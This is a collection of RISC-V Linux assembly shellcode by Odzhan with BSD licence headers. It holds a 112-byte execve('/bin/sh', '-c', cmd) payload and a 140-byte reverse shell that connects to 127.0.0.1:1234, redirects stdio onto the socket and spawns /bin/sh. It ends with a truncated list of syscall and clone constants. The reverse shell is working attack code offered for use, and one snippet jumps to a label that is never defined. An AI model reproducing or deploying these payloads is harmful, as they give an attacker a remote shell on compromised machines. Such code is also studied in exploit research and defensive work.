/**

Copyright © 2018 Odzhan. All Rights Reserved.

Redistribution and use in source and binary forms, with or without

modification, are permitted provided that the following conditions are

met:

1. Redistributions of source code must retain the above copyright

notice, this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright

notice, this list of conditions and the following disclaimer in the

documentation and/or other materials provided with the distribution.

3. The name of the author may not be used to endorse or promote products

derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR

IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED

WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE

DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,

INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES

(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR

SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)

HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,

STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN

ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE

POSSIBILITY OF SUCH DAMAGE. */

# 112 bytes

.include "include.inc"

.global _start

.text

# execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);

addi sp, sp, -64 # allocate 64 bytes of stack

li a7, SYS_execve

li a0, BINSH # a0 = "/bin/sh\0"

sd a0, (sp) # store "/bin/sh" on the stack

mv a0, sp

li a1, 0x632D # a1 = "-c"

sd a1, 8(sp) # store "-c" on the stack

addi a1, sp, 8

la a2, cmd # a2 = cmd

sd a0, 16(sp)

sd a1, 24(sp)

sd a2, 32(sp)

sd x0, 40(sp)

addi a1, sp, 16 # a1 = {"/bin/sh", "-c", cmd, NULL}

mv a2, x0 # penv = NULL

ecall

.asciz "echo Hello, World!"

/**

Copyright © 2018 Odzhan. All Rights Reserved.

Redistribution and use in source and binary forms, with or without

modification, are permitted provided that the following conditions are

met:

1. Redistributions of source code must retain the above copyright

notice, this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright

notice, this list of conditions and the following disclaimer in the

documentation and/or other materials provided with the distribution.

3. The name of the author may not be used to endorse or promote products

derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR

IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED

WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE

DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,

INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES

(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR

SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)

HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,

STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN

ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE

POSSIBILITY OF SUCH DAMAGE. */

# 140 bytes

.include "include.inc"

.equ PORT, 1234

.equ HOST, 0x0100007F # 127.0.0.1

.global _start

.text

addi sp, sp, -16

# s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

li a7, SYS_socket

li a2, IPPROTO_IP

li a1, SOCK_STREAM

li a0, AF_INET

ecall

mv a3, a0 # a3 = s

# connect(s, &sa, sizeof(sa));

li a7, SYS_connect

li a2, 16

li a1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)

sd a1, (sp)

mv a1, sp # a1 = &sa

ecall

# in this order

#

# dup3(s, STDERR_FILENO, 0);

# dup3(s, STDOUT_FILENO, 0);

# dup3(s, STDIN_FILENO, 0);

li a7, SYS_dup3

li a1, STDERR_FILENO + 1

mv a2, x0

mv a0, a3

addi a1, a1, -1

ecall

bne a1, zero, c_dup

# execve("/bin/sh", NULL, NULL);

li a7, SYS_execve

li a0, BINSH

sd a0, (sp)

mv a0, sp

ecall

/**

# symbolic constants for Linux/AArch64

.equ BINSH, 0x0068732F6E69622F

.equ BUFSIZ, 64

.equ NULL, 0

.equ SIGCHLD, 17

# sched.h

.equ CSIGNAL, 0x000000FF # signal mask to be sent at exit

.equ CLONE_VM, 0x00000100 # set if VM shared between processes

.equ CLONE_FS, 0x00000200 # set if fs info shared between processes

.equ CLONE_FILES, 0x00000400 # set if open files shared between processes

.equ CLONE_SIGHAND, 0x00000800 # set if signal handlers and blocked signals shared

.equ CLONE_PTRACE, 0x00002000 # set if we want to let tracing continue on the child too

.equ CLONE_VFORK, 0x00004000 # set if the parent wants the child to wake it up on mm_release

.equ CLONE_PARENT, 0x00008000 # set if we want to have the same parent as the cloner

.equ CLONE_THREAD, 0x00010000 # Same thread group?

.equ CLONE_NEWNS, 0x00020000 # New mount namespace group

.equ CLONE_SYSVSEM, 0x00040000 # share system V SEM_UNDO semantics

.equ CLONE_SETTLS, 0x00080000 # create a new TLS for the child

.equ CLONE_PARENT_SETTID, 0x00100000 # set the TID in the parent

.equ CLONE_CHILD_CLEARTID, 0x00200000 # clear the TID in the child

.equ CLONE_DETACHED, 0x00400000 # Unused, ignored

.equ CLONE_UNTRACED, 0x00800000 # set if the tracing process can't force CLONE_PTRACE